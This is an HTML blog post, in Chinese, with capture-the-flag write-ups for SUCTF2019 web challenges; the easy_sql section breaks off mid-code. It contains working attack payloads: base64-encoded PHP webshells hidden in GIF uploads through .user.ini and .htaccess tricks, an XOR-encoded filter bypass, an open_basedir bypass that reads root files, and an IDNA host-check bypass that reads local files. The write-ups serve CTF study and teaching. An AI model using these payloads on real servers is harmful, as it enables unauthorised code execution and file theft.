<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang="">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="CTF,">










<meta name="description" content="CheckIn题目是一个上传页面，中间件是nginx，尝试上传正常的图片返回如下结果  很奇怪的是路径下存在index.php，经过测试后发现改题目上传时对图片头也进行了校验，同时检验文件中是否存在&amp;lt;?，搜索利用到这篇文章 http://drops.xmd5.com/static/drops/tips-3424.html 利用.user.ini的设置来解析不是php后缀的文件，同时为了绕过&amp;">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="SUCTF2019部分web题解">
<meta property="og:url" content="https://yml-sec.top/2019/08/19/SUCTF2019部分web题解/index.html">
<meta property="og:site_name" content="yemoli&#39;s blog">
<meta property="og:description" content="CheckIn题目是一个上传页面，中间件是nginx，尝试上传正常的图片返回如下结果  很奇怪的是路径下存在index.php，经过测试后发现改题目上传时对图片头也进行了校验，同时检验文件中是否存在&amp;lt;?，搜索利用到这篇文章 http://drops.xmd5.com/static/drops/tips-3424.html 利用.user.ini的设置来解析不是php后缀的文件，同时为了绕过&amp;">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://i.loli.net/2019/08/19/bYqBDjaxR79t8Ul.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/QqerPExJ5jGgCLA.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/fahr5C1sOxvwBl4.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/MNj5XRCynTAGSq4.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/2qDlnVemMB3W54K.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/MSxE3dIWkBDoRKe.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/zj17Pwx4mDdgpFK.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/AzgwZrDQ4xs7B2h.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/a675ZHfQ2nM1SOi.png">
<meta property="og:image" content="https://i.loli.net/2019/08/19/rTP7iIA3UYENfR9.png">
<meta property="og:updated_time" content="2019-08-19T15:20:39.296Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="SUCTF2019部分web题解">
<meta name="twitter:description" content="CheckIn题目是一个上传页面，中间件是nginx，尝试上传正常的图片返回如下结果  很奇怪的是路径下存在index.php，经过测试后发现改题目上传时对图片头也进行了校验，同时检验文件中是否存在&amp;lt;?，搜索利用到这篇文章 http://drops.xmd5.com/static/drops/tips-3424.html 利用.user.ini的设置来解析不是php后缀的文件，同时为了绕过&amp;">
<meta name="twitter:image" content="https://i.loli.net/2019/08/19/bYqBDjaxR79t8Ul.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://yml-sec.top/2019/08/19/SUCTF2019部分web题解/">





  <title>SUCTF2019部分web题解 | yemoli's blog</title>
  








</head>

<body itemscope="" itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
    <header id="header" class="header" itemscope="" itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">yemoli's blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-friends">
          <a href="/friends/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            friends
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope="" itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://yml-sec.top/2019/08/19/SUCTF2019部分web题解/">

    <span hidden itemprop="author" itemscope="" itemtype="http://schema.org/Person">
      <meta itemprop="name" content="夜莫离、">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope="" itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="yemoli's blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">SUCTF2019部分web题解</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-19T12:24:28+08:00">
                2019-08-19
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Words count in article&#58;</span>
                
                <span title="Words count in article">
                  1.3k
                </span>
              

              
                <span class="post-meta-divider">|</span>
              

              
                <span class="post-meta-item-icon">
                  <i class="fa fa-clock-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Reading time &asymp;</span>
                
                <span title="Reading time">
                  6
                </span>
              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="CheckIn"><a href="#CheckIn" class="headerlink" title="CheckIn"></a>CheckIn</h1><p>题目是一个上传页面，中间件是nginx，尝试上传正常的图片返回如下结果</p>
<p><img src="https://i.loli.net/2019/08/19/bYqBDjaxR79t8Ul.png" alt=""></p>
<p>很奇怪的是路径下存在index.php，经过测试后发现改题目上传时对图片头也进行了校验，同时检验文件中是否存在&lt;?，搜索利用到这篇文章</p>
<p><a href="http://drops.xmd5.com/static/drops/tips-3424.html" target="_blank" rel="noopener">http://drops.xmd5.com/static/drops/tips-3424.html</a></p>
<p>利用.user.ini的设置来解析不是php后缀的文件，同时为了绕过&lt;?的检验使用伪协议</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">//.user.ini</span><br><span class="line">GIF89a</span><br><span class="line">auto_prepend_file=<span class="string">"php://filter/convert.base64-decode/resource=12.gif"</span></span><br></pre></td></tr></table></figure>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//12.gif</span></span><br><span class="line">GIF<span class="number">89</span>a<span class="number">12</span>PD<span class="number">9</span>waHAgQGV<span class="number">2</span>YWwoJF<span class="number">9</span>QT<span class="number">1</span><span class="symbol">NUW2</span>FdKTs/Pg==</span><br></pre></td></tr></table></figure>
<p>最后直接读flag就好</p>
<p><img src="https://i.loli.net/2019/08/19/QqerPExJ5jGgCLA.png" alt=""></p>
<h1 id="EasyPHP"><a href="#EasyPHP" class="headerlink" title="EasyPHP"></a>EasyPHP</h1><p>题目源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_the_flag</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="comment">// webadmin will remove your upload file every 20 min!!!! </span></span><br><span class="line">    $userdir = <span class="string">"upload/tmp_"</span>.md5($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">    <span class="keyword">if</span>(!file_exists($userdir))&#123;</span><br><span class="line">    mkdir($userdir);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">empty</span>($_FILES[<span class="string">"file"</span>]))&#123;</span><br><span class="line">        $tmp_name = $_FILES[<span class="string">"file"</span>][<span class="string">"tmp_name"</span>];</span><br><span class="line">        $name = $_FILES[<span class="string">"file"</span>][<span class="string">"name"</span>];</span><br><span class="line">        $extension = substr($name, strrpos($name,<span class="string">"."</span>)+<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">if</span>(preg_match(<span class="string">"/ph/i"</span>,$extension)) <span class="keyword">die</span>(<span class="string">"^_^"</span>); </span><br><span class="line">        <span class="keyword">if</span>(mb_strpos(file_get_contents($tmp_name), <span class="string">'&lt;?'</span>)!==<span class="keyword">False</span>) <span class="keyword">die</span>(<span class="string">"^_^"</span>);</span><br><span class="line">    <span class="keyword">if</span>(!exif_imagetype($tmp_name)) <span class="keyword">die</span>(<span class="string">"^_^"</span>); </span><br><span class="line">        $path= $userdir.<span class="string">"/"</span>.$name;</span><br><span class="line">        @move_uploaded_file($tmp_name, $path);</span><br><span class="line">        print_r($path);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$hhh = @$_GET[<span class="string">'_'</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (!$hhh)&#123;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(strlen($hhh)&gt;<span class="number">18</span>)&#123;</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'One inch long, one inch strong!'</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> ( preg_match(<span class="string">'/[\x00- 0-9A-Za-z\'"\`~_&amp;.,|=[\x7F]+/i'</span>, $hhh) )</span><br><span class="line">    <span class="keyword">die</span>(<span class="string">'Try something else!'</span>);</span><br><span class="line"></span><br><span class="line">$character_type = count_chars($hhh, <span class="number">3</span>);</span><br><span class="line"><span class="keyword">if</span>(strlen($character_type)&gt;<span class="number">12</span>) <span class="keyword">die</span>(<span class="string">"Almost there!"</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">eval</span>($hhh);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>正则过滤了绝大部分可用字符串，可以使用多个字符异或进行构造，但是直接调用函数长度明显是不够的，这里可以用GET的方式传入我们想要调用的函数，首先FUZZ出_GET</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">target = <span class="string">"_GET"</span></span><br><span class="line">payload = <span class="string">""</span></span><br><span class="line"><span class="keyword">for</span> tar <span class="keyword">in</span> target:</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">255</span>):</span><br><span class="line">        temp = <span class="number">233</span>^i</span><br><span class="line">        <span class="keyword">if</span> chr(temp) == tar:</span><br><span class="line">            payload = payload+str(hex(i))</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">head = <span class="string">"%e9"</span>*<span class="number">4</span></span><br><span class="line">payload = payload.replace(<span class="string">"0x"</span>,<span class="string">"%"</span>)</span><br><span class="line">print(head+<span class="string">"^"</span>+payload)</span><br></pre></td></tr></table></figure>
<p>output</p>
<figure class="highlight cos"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">%e</span>9<span class="built_in">%e</span>9<span class="built_in">%e</span>9<span class="built_in">%e</span>9<span class="symbol">^%b6</span><span class="built_in">%ae</span><span class="built_in">%ac</span><span class="built_in">%bd</span></span><br></pre></td></tr></table></figure>
<p>然后有如下代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$character_type = count_chars($hhh, <span class="number">3</span>);</span><br><span class="line"><span class="keyword">if</span>(strlen($character_type)&gt;<span class="number">12</span>) <span class="keyword">die</span>(<span class="string">"Almost there!"</span>);</span><br></pre></td></tr></table></figure>
<p>这里需要使字符串去重后小于等于12，于是构造出如下payload</p>
<figure class="highlight xquery"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$&#123;<span class="meta">%e9</span><span class="meta">%e9</span><span class="meta">%e9</span><span class="meta">%e9</span>^<span class="meta">%b6</span><span class="meta">%ae</span><span class="meta">%ac</span><span class="meta">%bd</span>&#125;&#123;<span class="meta">%bd</span>&#125;();</span><br></pre></td></tr></table></figure>
<p>然后调用函数 <code>get_the_flag()</code> 并构造上传表单</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">"http://47.111.59.243:9001/?_=$&#123;%e9%e9%e9%e9^%b6%ae%ac%bd&#125;&#123;%bd&#125;();&amp;%bd=get_the_flag"</span> <span class="attr">method</span>=<span class="string">"post"</span></span></span><br><span class="line"><span class="tag"><span class="attr">enctype</span>=<span class="string">"multipart/form-data"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">label</span> <span class="attr">for</span>=<span class="string">"file"</span>&gt;</span>Filename:<span class="tag">&lt;/<span class="name">label</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"file"</span> <span class="attr">name</span>=<span class="string">"file"</span> <span class="attr">id</span>=<span class="string">"file"</span> /&gt;</span> </span><br><span class="line"><span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"submit"</span> <span class="attr">name</span>=<span class="string">"submit"</span> <span class="attr">value</span>=<span class="string">"Submit"</span> /&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>上传这里需要绕过图片头和&lt;?的校验，可以用.htaccess</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//.htaccess</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> xlogo_width 200</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> xlogo_height 200</span></span><br><span class="line">AddType application/x-httpd-php .gif</span><br><span class="line">php_value auto_append_file <span class="string">"php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_8dda1f908043a81b3539472e2846b908/evil.gif"</span></span><br><span class="line"></span><br><span class="line"><span class="comment">//evil.gif</span></span><br><span class="line">GIF89a12PD9waHAgZXZhbCgkX1BPU1RbJ2MnXSk7Pz4=</span><br></pre></td></tr></table></figure>
<p>成功的getshell后访问跟目录时才发现是没有权限的，查看phpinfo的信息可以看到开启了open_basedir</p>
<p><img src="https://i.loli.net/2019/08/19/fahr5C1sOxvwBl4.png" alt=""></p>
<p>同时还禁用了一些函数</p>
<p><img src="https://i.loli.net/2019/08/19/MNj5XRCynTAGSq4.png" alt=""></p>
<p>尝试baypass open_basedir并用scandir()查看跟目录文件</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">chdir</span>(<span class="string">'upload'</span>);<span class="selector-tag">ini_set</span>(<span class="string">'open_basedir'</span>,<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">ini_set</span>(<span class="string">'open_basedir'</span>,<span class="string">'/'</span>);<span class="selector-tag">var_dump</span>(scandir(<span class="string">'/'</span>));</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2019/08/19/2qDlnVemMB3W54K.png" alt=""></p>
<p>读取flag</p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">chdir</span>(<span class="string">'upload'</span>);<span class="selector-tag">ini_set</span>(<span class="string">'open_basedir'</span>,<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">chdir</span>(<span class="string">'..'</span>);<span class="selector-tag">ini_set</span>(<span class="string">'open_basedir'</span>,<span class="string">'/'</span>);<span class="selector-tag">var_dump</span>(scandir(<span class="string">'/'</span>));<span class="selector-tag">chdir</span>(<span class="string">'/'</span>);<span class="selector-tag">var_dump</span>(file_get_contents(<span class="string">'THis_Is_tHe_F14g'</span>));</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2019/08/19/MSxE3dIWkBDoRKe.png" alt=""></p>
<h1 id="Pythonginx"><a href="#Pythonginx" class="headerlink" title="Pythonginx"></a>Pythonginx</h1><p>主要代码如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getUrl</span><span class="params">()</span>:</span></span><br><span class="line">    url = request.args.get(<span class="string">"url"</span>)</span><br><span class="line">    host = parse.urlparse(url).hostname</span><br><span class="line">    <span class="keyword">if</span> host == <span class="string">'suctf.cc'</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"我扌 your problem? 111"</span></span><br><span class="line">    parts = list(urlsplit(url))</span><br><span class="line">    host = parts[<span class="number">1</span>]</span><br><span class="line">    <span class="keyword">if</span> host == <span class="string">'suctf.cc'</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"我扌 your problem? 222 "</span> + host</span><br><span class="line">    newhost = []</span><br><span class="line">    <span class="keyword">for</span> h <span class="keyword">in</span> host.split(<span class="string">'.'</span>):</span><br><span class="line">        newhost.append(h.encode(<span class="string">'idna'</span>).decode(<span class="string">'utf-8'</span>))</span><br><span class="line">    parts[<span class="number">1</span>] = <span class="string">'.'</span>.join(newhost)</span><br><span class="line">    <span class="comment">#去掉 url 中的空格</span></span><br><span class="line">    finalUrl = urlunsplit(parts).split(<span class="string">' '</span>)[<span class="number">0</span>]</span><br><span class="line">    host = parse.urlparse(finalUrl).hostname</span><br><span class="line">    <span class="keyword">if</span> host == <span class="string">'suctf.cc'</span>:</span><br><span class="line">        <span class="keyword">return</span> urllib.request.urlopen(finalUrl).read()</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="string">"我扌 your problem? 333"</span></span><br></pre></td></tr></table></figure>
<p>我们需要最后利用下面的代码来读取文件</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">return</span> <span class="selector-tag">urllib</span><span class="selector-class">.request</span><span class="selector-class">.urlopen</span>(<span class="selector-tag">finalUrl</span>)<span class="selector-class">.read</span>()</span><br></pre></td></tr></table></figure>
<p>附上调试代码</p>
<figure class="highlight makefile"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">from urllib.parse import *</span><br><span class="line">url = <span class="string">"file://suctf.cc"</span></span><br><span class="line">host = urlparse(url)</span><br><span class="line">print(host.hostname)</span><br><span class="line">parts = list(urlsplit(url))</span><br><span class="line">print(parts)</span><br><span class="line">host = parts[1]</span><br><span class="line"><span class="section">print("host:"+host)</span></span><br><span class="line">print(parts)</span><br><span class="line">finalUrl = urlunsplit(parts).split(' ')[0]</span><br><span class="line">print(finalUrl)</span><br><span class="line">host = urlparse(finalUrl).hostname</span><br><span class="line"><span class="section">print("host:"+host)</span></span><br></pre></td></tr></table></figure>
<p>根据提示先读取nginx配置文件得到flag路径，然后读取flag</p>
<p><img src="https://i.loli.net/2019/08/19/zj17Pwx4mDdgpFK.png" alt=""></p>
<p><img src="https://i.loli.net/2019/08/19/AzgwZrDQ4xs7B2h.png" alt=""></p>
<h1 id="easy-sql"><a href="#easy-sql" class="headerlink" title="easy_sql"></a>easy_sql</h1><p>源码如下</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    session_start();</span><br><span class="line"></span><br><span class="line">    include_once &quot;config.php&quot;;</span><br><span class="line"></span><br><span class="line">    $post = array();</span><br><span class="line">    $get = array();</span><br><span class="line">    global $MysqlLink;</span><br><span class="line"></span><br><span class="line">    //GetPara();</span><br><span class="line">    $MysqlLink = mysqli_connect(&quot;localhost&quot;,$datauser,$datapass);</span><br><span class="line">    if(!$MysqlLink)&#123;</span><br><span class="line">        die(&quot;Mysql Connect Error!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    $selectDB = mysqli_select_db($MysqlLink,$dataName);</span><br><span class="line">    if(!$selectDB)&#123;</span><br><span class="line">        die(&quot;Choose Database Error!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    foreach ($_POST as $k=&gt;$v)&#123;</span><br><span class="line">        if(!empty($v)&amp;&amp;is_string($v))&#123;</span><br><span class="line">            $post[$k] = trim(addslashes($v));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    foreach ($_GET as $k=&gt;$v)&#123;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    //die();</span><br><span class="line">    ?&gt;</span><br><span class="line"></span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line"></span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;a&gt; Give me your flag, I will tell you if the flag is right. &lt;/a&gt;</span><br><span class="line">&lt;form action=&quot;&quot; method=&quot;post&quot;&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; name=&quot;query&quot;&gt;</span><br><span class="line">&lt;input type=&quot;submit&quot;&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">    if(isset($post[&apos;query&apos;]))&#123;</span><br><span class="line">        $BlackList = &quot;prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&amp;|\&quot;&quot;;</span><br><span class="line">        //var_dump(preg_match(&quot;/&#123;$BlackList&#125;/is&quot;,$post[&apos;query&apos;]));</span><br><span class="line">        if(preg_match(&quot;/&#123;$BlackList&#125;/is&quot;,$post[&apos;query&apos;]))&#123;</span><br><span class="line">            //echo $post[&apos;query&apos;];</span><br><span class="line">            die(&quot;Nonono.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        if(strlen($post[&apos;query&apos;])&gt;40)&#123;</span><br><span class="line">            die(&quot;Too long.&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        $sql = &quot;select &quot;.$post[&apos;query&apos;].&quot;||flag from Flag&quot;;</span><br><span class="line">        mysqli_multi_query($MysqlLink,$sql);</span><br><span class="line">        do&#123;</span><br><span class="line">            if($res = mysqli_store_result($MysqlLink))&#123;</span><br><span 